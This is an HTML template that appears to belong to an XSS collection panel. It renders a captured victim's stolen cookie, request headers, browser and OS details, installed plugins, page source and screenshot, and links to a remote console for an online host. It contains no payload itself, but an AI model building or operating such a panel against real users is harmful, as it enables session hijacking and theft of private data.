
{% extends "main.html" %}
{% block body %}
        <div class="row-fluid">
            <div class="span12">




                <div class="widget-box">
                    <div class="widget-title"> <span class="icon"> <i class="icon-th"></i> </span>
                        <h5>status : {%if host['online']==1%}Online &nbsp;&nbsp; \(￣▽￣)/{%else%}&nbsp;  Offline &nbsp;&nbsp;╮(╯_╰)╭{%end%}</h5>
                        <a href="http://{{url}}/host/{{host['projectid']}}/{{host['hostip']}}/{{page}}del" title="Del"><span class="label label-success"><i class='icon-trash'></i></span></a>
                        <a href="{%if host['online']==1%}http://{{url}}/console/{{host['id']}}{%else%}#{%end%}" title="Console"><span class="label"><i class='icon-random'></i></span></a>
                    </div>
                    <div class="widget-content ">
                        <table class="table table-bordered table-striped table-hover">
                            <tbody>
                            <tr>
                                <td class="span2">Time:</td>
                                <td class="span10" style="text-align: left">{{timede(host['addtime'])}}</td>

                            </tr>
                            <tr>
                                <td style="padding-top: 40px"> infomation:</td>
                                <td style="text-align: left">
                                    <ul>
									{% set info = urljson(host['information'])%}
                                        <li>location:{{info['location']}}</li>
                                        <li>toplocation:{{info['toplocation']}}</li>
                                        <li>Browser: {{info['Browser']}}&nbsp;&nbsp;&nbsp;Os：{{info['Os']}}&nbsp;&nbsp;&nbsp;flash: {{info['flash']}}&nbsp;&nbsp;&nbsp;java: {{info['java']}}</li>
                                        <li>title:{{info['title']}}</li>
									
                                    </ul>
                                </td>

                            </tr>
                            <tr>
                                <td style="padding-top: 40px"> Request Headers:</td>
                                <td style="text-align: left">
                                    <ul>
									{% set head = urljson(host['headers'])%}
                                        <li>HTTP_REFERER:{{head['Referer']}}</li>
                                        <li>HTTP_USER_AGENT:{{head['user-agent']}}</li>
                                        {%if head['X-Forwarded-For']%}<li>X-Forwarded-For:{{head['X-Forwarded-For']}}</li>{%end%}
                                        <li>Accept-Language:{{head['Accept-Language']}}</li>
                                    </ul>
                                </td>
                            </tr>
                            <tr>
                                <td style="padding-top: 10px"> Cookie:</td>
                                <td style="text-align: left">
								{{info['cookie']}}
                                </td>

                            </tr>
                            <tr>
                                <td style=""> Source code:</td>
                                <td style="text-align: left">{% if host['sourcecode']%}
                                    <a href="#code" role="button" class="btn" data-toggle="modal">View code</a>
									<div id="code" class="modal hide fade" tabindex="-1" role="dialog" aria-labelledby="myModalLabel" aria-hidden="true">
										<div class="modal-header">
											<button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button>
											<h3 id="myModalLabel">HTML CODE:</h3>
										</div>
										<div class="modal-body">
											<pre>{{urlde(host['sourcecode'])}}</pre>
										</div>
										<div class="modal-footer">
											<button class="btn" data-dismiss="modal" aria-hidden="true">close</button>
											
										</div>
									</div>
									{%else%}(>﹏<) There is nothing....{%end%}
                                </td>

                            </tr>
                            <tr>
                                <td style="{%if host['screen']%}padding-top: 55px{%end%}"> Screen:</td>
                                <td style="text-align: left">
								{%if host['screen']%}
                                    <ul class="thumbnails">
                                        <li class="span2"> <a> <img src="{{urlde(host['screen'])}}" alt="" > </a>
                                            <div class="actions"><a class="lightbox_trigger" href="{{urlde(host['screen'])}}"><i class="icon-search"></i></a> </div>
                                        </li>
                                        </ul>{% else%}(>﹏<) There is nothing....{%end%}
                                </td>

                            </tr>
                            <tr>
                                <td style=""> Receive:</td>
                                <td style="text-align: left">
								{%if host['receive']%}
								{%set res = urljson(host['receive'])%}
								{%else%}{%set res = ''%}{%end%}
								{%if 'softlist' in info or res or 'Plugins' in info %}
                                     <ul>
									{%if 'softlist' in info%}
									 <li>softlist: {{info['softlist']}}</li>
									 {%end%}
									 {%if 'Plugins' in info%}
									 <li>Plugins: {{info['Plugins']}}</li>
									 {%end%}
									 {%for re in res%}
                                        <li>{{re}}: {{res[re]}}</li>
									{%end%}
                                    </ul>
								{%else%}(>﹏<) There is nothing....{%end%}
                                </td>

                            </tr>


                            </tbody>
                        </table>
                        <div class="pagination text-right">
                            <ul>
                                
								{%for n in num%}
                                <li id="page{{n+1}}"><a href="http://{{url}}/host/{{host['projectid']}}/{{host['hostip']}}/{{n+1}}">{{n+1}}</a></li>
								{%end%}
                            </ul>
                        </div>
                    </div>
                </div>
<script>
window.onload=function(){
$("#page{{page}}").attr("class","active")
}
</script>

            </div>
        </div>
    </div>
</div>

{%end%}
